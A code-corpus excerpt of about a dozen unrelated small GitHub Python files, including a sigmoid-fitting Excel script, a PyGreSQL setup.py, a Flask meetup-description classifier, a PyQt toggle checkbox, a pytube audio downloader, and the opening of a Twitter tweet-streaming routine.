| Strongc/pc-jd | get_comment_count_aiohttp.py | get_comment_count_aiohttp.py | py | 4,036 | python | en | code | 0 | github-code | 13 |
18416183881 | import sys
player_name = input()
max_points = -sys.maxsize
winner = ''
while player_name != 'Stop':
player_points = 0
for i in player_name:
number = int(input())
i = ord(i)
if i == number:
player_points += 10
else:
player_points += 2
if player_points >= max_points:
max_points = player_points
winner = player_name
player_name = input()
print(f'The winner is {winner} with {max_points} points!')
| MiroVatov/Python-SoftUni | Python Basic 2020/Exam - 06 - Name Game.py | Exam - 06 - Name Game.py | py | 499 | python | en | code | 0 | github-code | 13 |
14113017883 | """
Created on Wed Jan 11 09:40:26 2017
@author: bobmek
"""
import openpyxl
import numpy as np
import pylab
from scipy.optimize import curve_fit
import xlsxwriter
#import panda as pd
#sigmoid funtion
def sigmoid(x, x0, k, a, c):
y =c+(a / (1 + np.exp(-k*(x-x0))))
return y
#commands to open notebook for I/O from Excel
wb1 = openpyxl.load_workbook('rawdata.xlsx')
s1=wb1.get_sheet_by_name('Sheet1')
s2=wb1.get_sheet_by_name('Sheet2')
writesheet=s2
workbook = xlsxwriter.Workbook('Testdata.xlsx')
worksheet = workbook.add_worksheet()
#Actually reading the data in the spreadsheet and transposing it
RawData=np.array([[cell.value for cell in col] for col in s1['A3':'CS300']])
Analogs=np.array([[cell.value for cell in col] for col in s1['B1':'CS1']])
TRawData=np.transpose(RawData)
time=TRawData[0]
numsamples=len(TRawData)
samples=TRawData[1:numsamples]
popt=np.zeros((numsamples-1, 4))
p0=([0,0,0,0])
def my_range(start, end, step):
while start <= end:
yield start
start += step
#Going throught the "Columns" in the spreadsheet and fitting them each to a sigmoid
for m in my_range(0, numsamples-1,5):
ydata=samples[m:m+4]
pcov=np.zeros((4, 4))
ydatalength=len(ydata)
#p0[2]=max(ydata[0:100])
#print(p0)
try:
popt[m], pcov = curve_fit(sigmoid, time, ydata, p0)
x = np.linspace(1,150000,2000)
y = sigmoid(x, *popt[m])
pylab.plot(time, ydata, '+', label='Raw Data')
pylab.plot(x,y, label='Sigmoid Fit')
pylab.plot(popt[m,0], popt[m,2]/2, 'o', label='EC50')
#pylab.ylim(0, 25000)
pylab.legend(loc='best')
pylab.title(Analogs[0,m])
count=str(m)
# savefig = Analogs[0,m] + '.png'
#
# pylab.savefig(savefig)
#
pylab.show()
except:
# for n in range (0,len(time)):
try:
ptry=([0,0,2500,0])
popt[m], pcov = curve_fit(sigmoid, time[0:len(time)/2], ydata, p0)
#print(n)
except:
print("nope")
pass
# try:
# p1=()
print(m)
FinishedData=np.empty([numsamples-1], dtype=[('analog_id', 'U16'), ('EC50','f4'), ('k-value', 'f4'),('amplitude','f4'),('baseline','f4') ])
FinishedData['EC50']=popt[:,0]
FinishedData['k-value']=popt[:,1]
FinishedData['amplitude']=popt[:,2]
FinishedData['baseline']=popt[:,3]
FinishedData['analog_id']=Analogs
#na_csv_output = np.zeros((len(FinishedData),), dtype=('U16,f4,f4,f4,f4'))
#df=pd.DataFrame(na_csv_output)
np.savetxt('Finished analyzed.txt', FinishedData, delimiter=",", fmt='%r %f %f %f %f')
worksheet.write('A1', 'Analog ID')
worksheet.write('B1', 'EC50')
worksheet.write('C1', 'K-Value')
worksheet.write('D1', 'Amplitude')
worksheet.write('E1', 'Baseline')
row = 1
col = 0
for m in range(0, numsamples-1):
worksheet.write (row, col, FinishedData[m][col])
worksheet.write (row, col + 1 , FinishedData[m][col+1])
worksheet.write (row, col + 2 , FinishedData[m][col+2])
worksheet.write (row, col + 3 , FinishedData[m][col+3])
worksheet.write (row, col + 4 , FinishedData[m][col+4])
row +=1
workbook.close()
#Actually write the analyzed data into the analyzed.xls spreadsheet
#for i in range(tot_tableshape[0]):
# for j in range(tot_tableshape[1]):
# writesheet[alph[i]+str(j+1)] = popt[i, j]
#
#wb1.save('analyzed.xlsx') | bobmek/fibrillation_analysis | sigmoid fit.py | sigmoid fit.py | py | 3,435 | python | en | code | 0 | github-code | 13 |
9038908542 | #!/usr/bin/env python
# Setup script for the PyGreSQL version 3
# created 2000/04 Mark Alexander <mwa@gate.net>
# tweaked 2000/05 Jeremy Hylton <jeremy@cnri.reston.va.us>
# win32 support 2001/01 Gerhard Haering <gerhard@bigfoot.de>
# requires distutils; standard in Python 1.6, otherwise download from
# http://www.python.org/sigs/distutils-sig/download.html
# You may have to change the first 3 variables (include_dirs,
# library_dirs, optional_libs) to match your postgres distribution.
# Now, you can:
# python setup.py build # to build the module
# python setup.py install # to install it
# See http://www.python.org/sigs/distutils-sig/doc/ for more information
# on using distutils to install Python programs.
from distutils.core import setup
from distutils.extension import Extension
import sys
if sys.platform == "win32":
# If you want to build from source; you must have built a win32 native libpq # before and copied libpq.dll into the PyGreSQL root directory.
win_pg_build_root = 'd:/dev/pg/postgresql-7.0.2/'
include_dirs=[ win_pg_build_root + 'src/include', win_pg_build_root + '/src/include/libpq', win_pg_build_root + 'src', win_pg_build_root + 'src/interfaces/libpq' ]
library_dirs=[ win_pg_build_root + 'src/interfaces/libpq/Release' ]
optional_libs=[ 'libpqdll', 'wsock32', 'advapi32' ]
data_files = [ 'libpq.dll' ]
else:
include_dirs=['/usr/include/pgsql']
library_dirs=['usr/lib/pgsql']
optional_libs=['pq']
data_files = []
setup (name = "PyGreSQL",
version = "3.1",
description = "Python PostgreSQL Interfaces",
author = "D'Arcy J. M. Cain",
author_email = "darcy@druid.net",
url = "http://www.druid.net/pygresql/",
licence = "Python",
py_modules = ['pg', 'pgdb'],
ext_modules = [ Extension(
name='_pg',
sources = ['pgmodule.c'],
include_dirs = include_dirs,
library_dirs = library_dirs,
libraries = optional_libs
)],
data_files = data_files
)
| orynider/php-5.6.3x4VC9 | postgresql/src/interfaces/python/setup.py | setup.py | py | 1,910 | python | en | code | 3 | github-code | 13 |
74789979857 | import requests
from googletrans import Translator
from random import choice
# tradutor
tradutor = Translator()
def pega_conselho(assunto=False):
""" A função acessa a API e retorna um conselho
Args:
assunto (bool, optional): Se tiver uma palavra como
argumento será retornado um conselho que tenha o assunto
relacionado com o argumento passado. Por defaults o
argumento é falso para que a função retorne um conselho
de forma aleatória.
Returns:
frase_traduzida: Retorna o conselho traduzido para o
idioma português.
"""
if assunto:
assunto_traduzido = tradutor.translate(assunto, dest='en').text
response = requests.get(f"https://api.adviceslip.com/advice/search/{assunto_traduzido}")
if response.json()['total_results']:
frase_escolhida = choice(response.json()['slips'])['advice']
else:
frase_escolhida = response.json()['message']['text']
else:
response = requests.get('https://api.adviceslip.com/advice')
frase_escolhida = response.json()['slip']['advice']
frase_traduzida = tradutor.translate(frase_escolhida, dest='pt').text
return frase_traduzida
def jogo_de_cartas():
"""Acessa uma API e pega os dados de duas cartas em um baralho de 52 cartas.
Returns:
pega_carta_jogador e pega_carta_bot: Retorna duas variáveis cada uma contendo um dicionário com os dados das cartas, como código, imagem, entre outros.
Abaixo segue os valores das chaves contidas nesse dicionário:
code, image, images, value e suit.
"""
LISTA_NIPE = ['HEARTS', 'CLUBS', 'DIAMONDS', 'SPADES']
LISTA_NIPE_TRADUZIDO = ['Coração', 'Paus', 'Ouro', 'Espadas']
VALOR_CARTA = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', 'JACK', 'QUEEN', 'KING', 'ACE']
VALOR_CARTA_TRADUZIDO = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14]
pega_baralho = requests.get('https://deckofcardsapi.com/api/deck/new/shuffle/?deck_count=1').json()
id_baralho = pega_baralho['deck_id']
# pegando os dados da carta do jogador -------------------- #
pega_carta_jogador = requests.get(f'https://deckofcardsapi.com/api/deck/{id_baralho}/draw/?count=1').json()['cards'][0]
## convertendo o nipe
nipe_carta_jogador = pega_carta_jogador['suit']
pega_carta_jogador['suit'] = LISTA_NIPE_TRADUZIDO[LISTA_NIPE.index(nipe_carta_jogador)]
### convertendo o valor
valor_carta_jogador = pega_carta_jogador['value']
pega_carta_jogador['value'] = VALOR_CARTA_TRADUZIDO[VALOR_CARTA.index(valor_carta_jogador)]
# pegando os dados da carta d0 bot -------------------- #
pega_carta_bot = requests.get(f'https://deckofcardsapi.com/api/deck/{id_baralho}/draw/?count=1').json()['cards'][0]
## convertendo o nipe
nipe_carta_bot = pega_carta_bot['suit']
pega_carta_bot['suit'] = LISTA_NIPE_TRADUZIDO[LISTA_NIPE.index(nipe_carta_bot)]
### convertendo o valor
valor_carta_bot = pega_carta_bot['value']
pega_carta_bot['value'] = VALOR_CARTA_TRADUZIDO[VALOR_CARTA.index(valor_carta_bot)]
return pega_carta_jogador, pega_carta_bot
| danielns-op/sitecomflask | apis/apis.py | apis.py | py | 3,283 | python | pt | code | 0 | github-code | 13 |
73701643217 | def rev(n, temp=''):
''' n-indicates the number to be reversed,
output:Return the number in reversed order in the string format'''
# YOUR CODE GOES HERE
if n// 10 == 0:
return temp + str(n)
next_n = n // 10
last_digit = n % 10
temp += str(last_digit)
return rev(next_n, temp)
rev(100) | debnsuma/masters-ml | M1-M5/string_reverse_recursive.py | string_reverse_recursive.py | py | 334 | python | en | code | 0 | github-code | 13 |
15954365825 | # -*- coding: UTF-8 -*-
import json
import time
# from MALL.config import setting
#
# setting_params = setting.DATABASE
# record_path = "{}\{}".format(setting_params['path'], setting_params['shop'])
def shop_record(data_path, username, action_type, shop_list, amount):
with open("{}/record_of_{}.json".format(data_path, username), 'r', encoding='utf-8') as load_f:
record_dict = json.load(load_f)
current_time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
month = current_time.split('-')[1][-1]
commodities = ','.join(shop_list)
try:
record_dict[month].append(current_time + " " + action_type + " " + commodities + " " + amount)
except KeyError:
record_dict[month] = [current_time + " " + action_type + " " + commodities + " " + amount]
with open("{}/record_of_{}.json".format(data_path, username), 'w', encoding='utf-8') as dump_f:
json.dump(record_dict, dump_f)
# shop_record(record_path, "bigberg", "buy", ["iphone", "mac"], '18000')
| Bigberg/python | day5--ATM/MALL/core/shop_record.py | shop_record.py | py | 1,027 | python | en | code | 0 | github-code | 13 |
23769483050 | import sys
sys.path.append("../../")
from copy import deepcopy
import pandas as pd
from train_model import train
from notebooks.fc.hyperparams import hyperparameter as fc_hyperparameter
from notebooks.kc.hyperparams import hyperparameter as kc_hyperparameter
from notebooks.poa.hyperparams import hyperparameter as poa_hyperparameter
from notebooks.sp.hyperparams import hyperparameter as sp_hyperparameter
from notebooks.nl.hyperparams import hyperparameter as nl_hyperparameter
envs = {
"kc": {
"hyperparameter": kc_hyperparameter,
"max_neighbours": [50, 50, 50, 50, 50, 100, 150, 250], # efficient value for each of the thresholds, just to not keep more data in memory than needed
"sequence": "300" # dataset number of neihbours to use, just for efficiency
},
"poa": {
"hyperparameter": poa_hyperparameter,
"max_neighbours": [50, 100, 100, 150, 250, 450, 700, 950],
"sequence": "1200"
},
"sp": {
"hyperparameter": sp_hyperparameter,
"max_neighbours": [50, 50, 100, 150, 350, 650, 1000, 1250],
"sequence": "2400"
},
"fc": {
"hyperparameter": fc_hyperparameter,
"max_neighbours": [50, 50, 150, 250, 500, 1050, 1550, 2250],
"sequence": "2400"
},
"nl": {
"hyperparameter": nl_hyperparameter,
"max_neighbours": [50, 50, 100, 100, 250, 650, 1100, 1900],
"sequence": "2400"
}
}
def train_and_save(db_name, hyperparameter, df, iteration):
spatial = train(**hyperparameter)
dataset, results, fit, embedded_train, embedded_test, predict_regression_train, predict_regression_test = spatial(SEQUENCE=envs[db_name]['sequence'])
# add results to dataframe
res = {
"Dataset": db_name,
"iteration": iteration,
"isMasked": hyperparameter["use_masking"],
"threshold": hyperparameter["mask_dist_threshold"],
"MALE_test": results[0],
"RMSE_test": results[1],
"MAPE_test": results[2],
"MALE_train": results[3],
"RMSE_train": results[4],
"MAPE_train": results[5]
}
df = pd.concat([df, pd.DataFrame([res])])
df.to_csv(f"results_{db_name}.csv")
return df
if __name__ == "__main__":
df = pd.DataFrame([] ,columns=["Dataset", "iteration", "isMasked", "threshold", "MALE_test", "RMSE_test", "MAPE_test", "MALE_train", "RMSE_train", "MAPE_train"])
thresholds = [0.01, 0.05, 0.1, 0.2, 0.35, 0.6, 0.8, 1.0]
env_name = sys.argv[1]
if env_name == "nl":
thresholds = [0.1, 1.0, 2.5, 5.0, 10.0, 25.0, 35.0, 50.0] # different thresholds for nl
assert len(thresholds) == len(envs[env_name]["max_neighbours"])
ITERATIONS = 10
for i in range(ITERATIONS):
print("Training on {}".format(env_name))
params = deepcopy(envs[env_name]["hyperparameter"])
df = train_and_save(env_name, params, df, iteration=i+1) # original run
params["use_masking"] = True
for threshold, max_neighbours in zip(thresholds, envs[env_name]["max_neighbours"]):
print(max_neighbours)
params["num_nearest"] = max_neighbours
params["num_nearest_geo"] = max_neighbours
params["num_nearest_eucli"] = max_neighbours
params["mask_dist_threshold"] = threshold
print("Training on {} with threshold {} and max_neighbours {}".format(env_name, params["mask_dist_threshold"], params["num_nearest"]))
df = train_and_save(env_name, params, df, iteration=i+1)
| Koen-Git/UC_Project_HPP | experiments.py | experiments.py | py | 3,556 | python | en | code | 1 | github-code | 13 |
834241665 | from bs4 import BeautifulSoup
import requests as req
import pandas as pd
SEASONS = [2018, 2019, 2020, 2021]
# code to find league - ES - Espanyol, 2 - second league level
CODE = 'ES2'
# link that works for all leagues (change only code & season for request)
# url = f'https://www.transfermarkt.com/laliga2/startseite/wettbewerb/{code}/plus/?saison_id={season}'
HEADERS = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'}
data = {'team': [],
'season': [],
'squad': [],
'age': [],
'foreigners': [],
'market_value': [],
'total_market_value': []}
# web scraping
for season in SEASONS:
url = f'https://www.transfermarkt.com/laliga2/startseite/wettbewerb/{CODE}/plus/?saison_id={SEASONS}'
response = req.get(url, headers=HEADERS)
bs = BeautifulSoup(response.content, 'html.parser')
all_tr = bs.find_all('tr', {'class': ['odd', 'even']}, limit=22) # limit - number of teams in the league
for row in all_tr:
all_td = row.find_all('td', recursive=False)
data['team'].append(all_td[1].text)
data['squad'].append(all_td[2].text)
data['season'].append(season)
data['age'].append(all_td[3].text)
data['foreigners'].append(all_td[4].text)
data['market_value'].append(all_td[5].text)
data['total_market_value'].append(all_td[6].text)
# create dataframe
df = pd.DataFrame(data)
def convert_currency_to_number(df_row):
"""Convert currency values format to number"""
if df_row[-1] == 'm':
return df_row.replace('.', '')[1:-1] + '0000'
else:
return df_row[1:-3] + '000'
# clear strings
df['team'] = df['team'].apply(lambda row: row.strip())
# converting value columns
df['market_value'] = df['market_value'].apply(convert_currency_to_number)
df['total_market_value'] = df['total_market_value'].apply(convert_currency_to_number)
# save to csv
df.to_csv('team_market_value')
if __name__ == '__main__':
print(df.head())
df.to_csv('team_market_value_web_scraping_2.csv', index=False)
| Daniel-Prus/segunda_division_draw_analysis | 3_external_variables/01_teams_market_value_web_scraping.py | 01_teams_market_value_web_scraping.py | py | 2,127 | python | en | code | 0 | github-code | 13 |
35210830454 | # Uses python3
import sys
def optimal_weight(W, weights):
table = [[0 for v in range(W + 1)] for w in range(len(weights) + 1)]
for w in range(1, len(weights) + 1):
for v in range(W + 1):
if v < weights[w - 1]:
table[w][v] = table[w - 1][v]
else:
table[w][v] = max(table[w - 1][v], (weights[w - 1]) + table[w - 1][v - weights[w - 1]])
return table[-1][-1]
if __name__ == '__main__':
input = sys.stdin.read()
W, n, *w = list(map(int, input.split()))
print(optimal_weight(W, w))
| vinaykudari/data-structures-and-algorithms | algorithmic-toolbox/week6_dynamic_programming2/1_maximum_amount_of_gold/knapsack.py | knapsack.py | py | 570 | python | en | code | 0 | github-code | 13 |
15624302930 | from embod_client import AsyncClient
import argparse
from datetime import datetime
import numpy as np
from uuid import UUID
class FPSMonitor:
def __init__(self, agent_ids):
self._times = []
self._frame_count = 0
self._max_frame_count = 1000
self._frame_time = np.zeros(self._max_frame_count)
self._last_time = None
self._agent_ids = [UUID(agent_id) for agent_id in agent_ids]
async def _connect_callback(self):
for agent_id in self._agent_ids:
await self.client._add_agent(agent_id)
async def _state_callback(self, agent_id, state, reward, error):
"""
This function gets called every time there is a state update from the environment
:param state: The state of the agent in the environment
:param reward: The reward from the environment in the current state
:param error: If there are any errors reported from the environment
:return:
"""
if error:
print("Error: %s" % error.decode('UTF-8'))
#self.client.stop()
#return
current_time = datetime.utcnow()
if self._last_time is not None:
time_between = current_time - self._last_time
self._frame_time[self._frame_count] = time_between.days * 86400000 + time_between.seconds * 1000 + time_between.microseconds / 1000
if (self._frame_count + 1) % 100 == 0:
average = self._frame_time[max(0, self._frame_count - 100):self._frame_count].mean()
print("States per second: %.2f" % (1000.0/average))
# Send an empty state, so the agent does not move anywhere
if hasattr(self.client, '_action_size') and self.client._action_size is not None:
await self.client.send_agent_action(agent_id, np.zeros(self.client._action_size))
self._last_time = current_time
self._frame_count += 1
if self._frame_count == self._max_frame_count:
for agent_id in self._agent_ids:
await self.client._remove_agent(agent_id)
self.client.stop()
def start(self, apikey, host):
self.client = AsyncClient(apikey, self._connect_callback, self._state_callback, host)
self.client.start()
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Test frames per second, example application.')
parser.add_argument('-p', required=True, dest='apikey', help='Your embod.ai API key')
parser.add_argument('-a', required=True, dest='agent_ids', nargs='+', help='The id of the agent you want to control')
parser.add_argument('-H', default="wss://api.embod.ai", dest='host', help="The websocket host for the environment")
args = parser.parse_args()
fps = FPSMonitor(args.agent_ids)
fps.start(args.apikey, args.host)
| embod/embod-client | embod_client/example/fps_monitor.py | fps_monitor.py | py | 2,858 | python | en | code | 3 | github-code | 13 |
70102264018 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
import pickle
try:
import emoji
except ImportError:
get_ipython().system('pip install emoji --user')
import emoji
#try:
# from bs4 import BeautifulSoup
#except:
# !pip install bs4 --user
# from bs4 import BeautifulSoup
from tqdm.autonotebook import tqdm
tqdm.pandas()
try:
import nltk
#raise Exception
except:
get_ipython().system('pip install nltk --user')
import nltk
nltk.download('punkt')
#try:
# import textblob
#except:
# !pip install textblob --user
# import textblob
import re
try:
from polyglot.detect import Detector
except ImportError:
#!pip install --user pyicu pycld2
get_ipython().system('pip install polyglot --user')
from polyglot.detect import Detector
try:
from googletrans import Translator
except:
get_ipython().system('pip install googletrans --user')
from googletrans import Translator
# In[ ]:
#nltk.download('wordnet')
from nltk.corpus import wordnet as wn
from nltk.stem.wordnet import WordNetLemmatizer
from nltk import word_tokenize, pos_tag
from collections import defaultdict
import tensorflow
print("tf", tensorflow.__version__)
# In[2]:
from flask import Flask, request, render_template
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer
import nltk
from nltk.corpus import stopwords
#nltk.download('stopwords')
#nltk.download('averaged_perceptron_tagger')
import gensim
from gensim.models.doc2vec import TaggedDocument
from tensorflow.keras.models import load_model
set(stopwords.words('english'))
app = Flask(__name__)
df = pd.read_pickle("/home/dario/tm-project/data/df_preprocessed_eng_remap.pckle")
doc2vec_model = gensim.models.Doc2Vec.load("model_doc2vec")
#model = load_model("NN_model.h5")
model = load_model("model_new.h5")
def vec_for_learning(model, tagged_docs):
#sents = tagged_docs.values
regressors = [model.infer_vector(doc.words, steps=20) for doc in tqdm(tagged_docs.values)]
return regressors
def fake_tagged_doc(desc):
arr=np.asarray(desc)
arr=pd.Series(arr)
test_tagged = arr.apply( lambda r: TaggedDocument(words=str(r).split(" "), tags=["NaN"]))#, axis=1)
return test_tagged
import emoji
def give_emoji_free_text(text):
allchars = [str for str in text]
emoji_list = [c for c in allchars if c in emoji.UNICODE_EMOJI]
clean_text = ' '.join([str for str in text.split() if not any(i in str for i in emoji_list)])
return clean_text
def detect_lang(text):
try:
lang = Detector(text, quiet=True)
if lang.reliable:
return lang.language.name if lang.language.confidence > 50 else "low_conf"
else:
return "not_reliable"
except Exception as e:
return "error"
# In[8]:
europ_languages = ["english", 'danish', 'dutch', 'english', 'finnish', 'french', 'german', 'hungarian', 'italian', 'norwegian', 'portuguese', 'russian', 'spanish', 'swedish', 'turkish']
stopwords = set(nltk.corpus.stopwords.words(europ_languages))
tag_map = defaultdict(lambda : wn.NOUN)
tag_map['J'] = wn.ADJ
tag_map['V'] = wn.VERB
tag_map['R'] = wn.ADV
#text = "Another way of achieving this task"
#tokens = word_tokenize(text)
lemmatizer = WordNetLemmatizer()
badwords=[
"www", "http", "https", "th", "pm", "ticket", "org", "event", "link", "registr", "hi", "oil", "en", "lo", "ca",
"month", "monday", "tuesday", "wednesday", "thursday","friday", "saturday", "sunday",
"meetup","meetups", "meet","area","happen", "event", "group", "regist", "pleas", "please", "join", "rsvp", "member", "mask",
"venu", "free", "comment", "thank", "attend", "eventbrit", "mr", "st", "rd", "hour", "mask", "locat", "everyone", "everyon", "contact", "anyone", "great",
"new", "time", "stand", "host", "check", "line", "com", "fee", "cost", "people", "day", "new", "know", "inform", "email", "bring","welcome", "welcom",
"boston", "like", "la", "en", "los", "come", "let", "facebook", "available", "help", "look", "register", "sign","registration", ]
len(badwords), len(set(badwords)) #woops
# In[9]:
def preproc(raw_text, badwords = badwords, lemmatizer = lemmatizer, stopwords = stopwords, tag_map = tag_map):
text = re.sub(r'''(?i)\b((?:https?://|www\d{0,3}[.]|[a-z0-9.\-]+[.][a-z]{2,4}/)(?:[^\s()<>]+|\(([^\s()<>]+|(\([^\s()<>]+\)))*\))+(?:\(([^\s()<>]+|(\([^\s()<>]+\)))*\)|[^\s`!()\[\]{};:'".,<>?«»“”‘’]))''', " ", raw_text)
text = give_emoji_free_text(text)
lang = detect_lang(text)
if lang != "English":
langs=Detector(text).languages
lang=langs[0].name.lower()
translator= Translator()#from_lang=langs[0].code, to_lang="en")
text = translator.translate(text).text
text = text.replace("'s ", " ")
text = re.sub("[^a-zA-Z]", " ", text).lower().split( ) #.replace("|","").replace("!","").replace("?","")
text = [token for token in text if all([token not in stopwords, token not in badwords])]
text = [lemmatizer.lemmatize(token, tag_map[tag[0]]) for token, tag in pos_tag(text)]
text = [elem for elem in text if elem not in badwords] #badwords after stemming
return (" ".join(text))
from sklearn.preprocessing import LabelEncoder
from keras.utils import to_categorical
lb = LabelEncoder().fit(df.remap_category)
@app.route('/')
def my_form():
return render_template('form.html')
@app.route('/', methods=['POST'])
def my_form_post(preproc = preproc, fake_tagged_doc=fake_tagged_doc, vec_for_learning = vec_for_learning, model = model, doc2vec_model = doc2vec_model):
text1 = request.form['text1'].lower()
clean_test=preproc(text1)
tag_doc=fake_tagged_doc(clean_test)
desc_vec=vec_for_learning(doc2vec_model, tag_doc)
predicted_category=model.predict_classes(np.array(desc_vec))
proba = np.max(model.predict(np.array(desc_vec)))
return render_template('form.html', final=round(proba, 2), text1=text1, category = lb.inverse_transform(predicted_category))
if __name__ == "__main__":
app.run(debug=True, host="127.0.0.1", port=5002, threaded=True)
| faber6911/meetup-topics | live_demo/app_jupy.py | app_jupy.py | py | 6,370 | python | en | code | 1 | github-code | 13 |
11976084663 | '''
随机裁剪指定大小的区域
'''
import matplotlib.pyplot as plt
from torchvision import transforms
from PIL import Image
img1=Image.open("sunflower.jpg")
img2=transforms.RandomResizedCrop(224)(img1)
img3=transforms.RandomResizedCrop(224)(img1)
img4=transforms.RandomResizedCrop(224)(img1)
plt.subplot(2,2,1),plt.imshow(img1),plt.title("original")
plt.subplot(2,2,2),plt.imshow(img2),plt.title("crop1")
plt.subplot(2,2,3),plt.imshow(img3),plt.title("crop2")
plt.subplot(2,2,4),plt.imshow(img4),plt.title("crop3")
plt.show() | pepperbubble/DL | function_practice/RandomResizedCrop.py | RandomResizedCrop.py | py | 532 | python | ru | code | 0 | github-code | 13 |
70612967697 | N = int(input())
gram = list(map(int, input().split()))
gram.sort()
if gram[0] != 1:
print(1)
else :
SUM = 1
for i in range(1, N):
if gram[i] > SUM+1:
break
else:
SUM+=gram[i]
print(SUM+1)
| yoonhoohwang/Algorithm | BackJoon/2437. 저울.py | 2437. 저울.py | py | 257 | python | en | code | 2 | github-code | 13 |
36876015669 | #!/usr/bin/env python3
import string
import sys
def parse(data):
return data
def readfile(sep="\n"):
try:
f = open("input.txt")
data = f.read().split(sep)
f.close()
except Exception as e:
sys.stderr.write(f"{e}\n")
sys.exit(1)
for line in data:
if line == "":
data.remove(line)
return parse(data)
def parseResult(res):
return res
def solve(data):
res = 0
alphabet = string.ascii_lowercase + string.ascii_uppercase
data_dict = dict()
i = 0
for letter in alphabet:
i += 1
data_dict[letter] = i
for i in range(0, len(data), 3):
xs = list()
for d in data[i]:
if d in data_dict.keys() and d in data[i+1] and d in data[i+2]:
res += data_dict[d]
break
return parseResult(res)
def output(res):
sys.stdout.write(f"{res}\n")
return 0
def main():
output(solve(readfile()))
return 0
if __name__ == '__main__':
sys.exit(main())
| rodfer0x80/aoc2022 | src/day_3/part_2.py | part_2.py | py | 1,056 | python | en | code | 0 | github-code | 13 |
11835682715 | from PyQt5.QtCore import (
QEasingCurve,
Qt,
QPropertyAnimation,
QRect,
QPoint,
pyqtProperty,
)
from PyQt5.QtGui import QColor, QPainter
from PyQt5.QtWidgets import QCheckBox
class CustomCheckBox(QCheckBox):
def __init__(
self,
text,
parent=None,
width=40,
bg_color="#777",
circle_color="#DDD",
circle_color_checked="#DDD",
active_color="#00BCFF",
animation_curve=QEasingCurve.OutBounce,
text_width=250,
spacing=6,
):
# QCheckBox.__init__(self)
super().__init__(parent)
self.setFixedSize(width + text_width + spacing, 20)
self.setCursor(Qt.PointingHandCursor)
self.check_box_width = width
self.spacing = spacing
self.text_width = text_width
# COLORS
self._bg_color = bg_color
self._circle_color = circle_color
self._circle_color_checked = circle_color_checked
self._active_color = active_color
self._position = 3
self.animation = QPropertyAnimation(self, b"position")
self.animation.setEasingCurve(animation_curve)
self.animation.setDuration(500)
self.stateChanged.connect(self.setup_animation)
# set the text
self.setText(text)
if parent is not None:
self.show()
@pyqtProperty(float)
def position(self):
return self._position
@position.setter
def position(self, pos):
self._position = pos
self.update()
# START STOP ANIMATION
def setup_animation(self, value):
self.animation.stop()
if value:
self.animation.setEndValue(self.check_box_width - 19)
else:
self.animation.setEndValue(4)
self.animation.start()
def hitButton(self, pos: QPoint):
return self.contentsRect().contains(pos)
def paintEvent(self, e):
p = QPainter(self)
p.setRenderHint(QPainter.Antialiasing)
# SET PEN
p.setPen(Qt.NoPen)
if not self.isChecked():
p.setBrush(QColor(self._bg_color))
p.drawRoundedRect(0, 0, self.check_box_width, 20, 10, 10)
p.setBrush(QColor(self._circle_color))
p.drawEllipse(int(self._position), 2, 16, 16)
else:
p.setBrush(QColor(self._active_color))
p.drawRoundedRect(0, 0, self.check_box_width, 20, 10, 10)
p.setBrush(QColor(self._circle_color_checked))
p.drawEllipse(int(self._position), 2, 16, 16)
# DRAW TEXT
text_rect = QRect(
self.check_box_width + self.spacing, 0, self.text_width, self.height()
)
text = self.text()
font = p.font()
font.setPixelSize(12)
p.setFont(font)
p.setPen(QColor("#FFF"))
p.drawText(text_rect, Qt.AlignLeft | Qt.AlignVCenter, text)
p.end()
| Aabdelmoumen/wang_grace | widgets/CustomCheckBox.py | CustomCheckBox.py | py | 2,925 | python | en | code | 0 | github-code | 13 |
29864312887 | import math
import multiprocessing as mp
import requests
from pytube import YouTube # local version -> able to fix things quickly in case youtube changes stuff
def download_audio(video_url, path):
"""Download audio from YouTube video using multiple connections in parallel.
:param video_url: YouTube video url.
:param path: Destination path for downloaded audio track.
"""
stream = YouTube(video_url).streams.get_by_itag(249) # 249 = <Stream: itag="249" mime_type="audio/webm" abr="50kbps" acodec="opus">
url = stream.url # get direct download url
filesize = stream.filesize
# split filesize in chunks
CHUNK_SIZE = 3 * 2 ** 20 # in bytes
ranges = [[url, i * CHUNK_SIZE, (i + 1) * CHUNK_SIZE - 1] for i in range(math.ceil(filesize / CHUNK_SIZE))]
ranges[-1][2] = None # last range must be to the end of file, so it will be marked as None
pool = mp.Pool(min(len(ranges), 64)) # worker pool for multiprocessing
chunks = [0 for _ in ranges] # init list of chunks
# download chunks
for i, chunk_tuple in enumerate(pool.imap_unordered(_download_chunk, enumerate(ranges)), 1):
idx, chunk = chunk_tuple
chunks[idx] = chunk
# write chunks to final file
with open(path, 'wb') as outfile:
for chunk in chunks:
outfile.write(chunk)
def _download_chunk(args):
"""Download a single chunk.
:param args: Tuple consisting of (url, start, finish) with start and finish being byte offsets.
:return: Tuple of chunk id and chunk data
"""
idx, args = args
url, start, finish = args
range_string = '{}-'.format(start)
if finish is not None:
range_string += str(finish)
response = requests.get(url, headers={'Range': 'bytes=' + range_string}) # Actual HTTP get download request
return idx, response.content
| cemfi/score-tube | backend/youtube.py | youtube.py | py | 1,858 | python | en | code | 2 | github-code | 13 |
15049024906 | from enum import IntEnum, auto
from typing import Optional
import pandas as pd
import python_lib_for_me as pyl
import tweepy
from tweepy.models import ResultSet
from twitter_app.util import const_util, pandas_util
from twitter_app.util.twitter_api_v1_1.standard import twitter_tweets_util, twitter_users_util
class EnumOfProcTargetItem(IntEnum):
USER_ID = auto()
LIST_ID = auto()
LIST_NAME = auto()
FILE_PATH = auto()
def do_logic(
use_debug_mode: bool,
api: tweepy.API,
enum_of_proc_target_item: EnumOfProcTargetItem,
item: str,
keyword_of_csv_format: str,
header_line_num: int = -1,
) -> None:
clg: Optional[pyl.CustomLogger] = None
try:
# ロガーの取得
clg = pyl.CustomLogger(__name__, use_debug_mode=use_debug_mode)
clg.log_inf(f"ロジック実行(Twitterツイート配信)を開始します。")
# ユーザページの取得
user_pages: list[ResultSet] = []
